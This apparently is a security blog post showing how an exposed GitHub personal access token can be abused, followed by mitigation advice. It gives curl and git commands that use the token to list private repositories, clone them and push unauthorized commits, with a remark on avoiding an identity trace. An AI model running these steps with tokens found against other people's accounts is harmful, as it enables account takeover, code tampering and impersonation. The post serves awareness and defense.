Github’s Personal Access token use for Authentication and leaving it somewhere in your configs or notes can leads to disaster depending on how much access you have given to this token.

Anyone with access to this token can gain unauthorize access to your github account and misuse it for their advantages.

For example:

  • Read or write to private repos
  • Delete Repos
  • Modifying Code
  • Access Sensitive Data
  • Escalating Privileges, changing repo setting, etc.
  • Act on behalf of your identity

This is My Proof of Concept to demonstrate A Simple Attack against publicly exposed PAT TOKEN to access Private Repositories and Pushing Unauthorize code changes on behalf of Github Account Owner.

Exploiting Github’s PAT to Enumerate Private Repositories

This is my Personal Access Token

ghp_R7DSrylV1usometoken4FK7lc

Dont try to attack it cuz its already been revoked. :p

This is how yours will be look like too. To learn about generating one of em click on this link

Leverage GitHub’s REST API

Making an API Request to Enumerate Repositories

GitHub’s REST API allows you to interact with user data, including listing their private repositories.

Generate a Request with the Personal Access Token

The endpoint for listing repositories is:

GET /user/repos

However, you need to add an authorization header with the personal access token to authenticate. You can do this using curl, Python (requests), or other HTTP clients.

We will be using curl to enumerate repos.

curl -H "Authorization: token <your_personal_access_token>" "https://api.github.com/user/repos"

This will return JSON response with the list of both public and private repos.

but we want only private repos so we apend ?visibility=private however its still giving us unwanted output but we want only list of repos so here comes jq for the rescue - a json processor.

So this is full command looks like

curl -H "Authorization: token ghp_R7DSrylV1uUoxxxxxxSUcfBXl2E4FK7lc" "https://api.github.com/user/repos?visibility=private" | jq -r '.[].html_url'

Expected output:

https://github.com/elon/x-secret-project
https://github.com/elon/ai-countermeasures
https://github.com/elon/my-friends-on-mars

Now that we learned we have access to private repos lets try modifying and pushing code of any one repository.

But first we clone the repo using token because its private.

Git cloning the repo

# syntax
git clone https://username:<token>@github.com/username/repository.git

# command in my case
git clone https://srngx:ghp_R7DSrylV1uUoPT2HhSSxxxSUcfBXl2E4FK7lc@github.com/srngx/private_repo.git

Pushing to Repo

touch somefile
git add somefile
git commit -m "testing PAT"

Push using token

git push origin main

When asked for password use token instead of password.

also if you’re passing the token in the clone URL (as shown earlier), it will automatically authenticate for pushing as well, and you won’t be prompted for username/password.

git push https://username:ghp_exampletoken1234@github.com/username/private-repo.git

Note

If you dont have github global config setup it will use the private repo owners name and email. but if you want to leave your imprint (which malicious hacker wont normally do) and add yourself in contributors list in your victims github repo then you can setup global config.

git config --global user.name "your name"
git config --global user.email "you@email.com"

also you can use something like Git Credential Helper to store your credentials securely to avoid manually entering username and password everytime you use git push.

git config --global credential.helper cache

Mitigations

Mitigation Steps If a PAT Is Exposed

If you’ve exposed your PAT publicly, take immediate action to protect your account:

  1. Revoke the Exposed PAT
  1. Generate a New PAT
  • Create new token and this time try to not exposing it.
  1. Audit Your Account:
  • Review recent activity in your repositories for any suspicious actions (commits, issues, pull requests, etc.).
  • Check if any unauthorized changes were made to your repositories or account settings.
  1. Use More Secure Storage for Tokens:
  • Environment variables: Store tokens in environment variables, not in the code.
  • Password managers: Use a password manager to securely store and manage tokens.
  • GitHub Secrets: For CI/CD pipelines, use GitHub Actions secrets or other secure vaults to store tokens.
  1. Set Appropriate Scopes for PATs:
  • Always limit the scope of your tokens to the least privilege required. For example, if you only need read access, do not grant write or admin access.
  1. Enable Two-Factor Authentication (2FA):
  • Enable two-factor authentication on your GitHub account for an added layer of protection in case your credentials are compromised.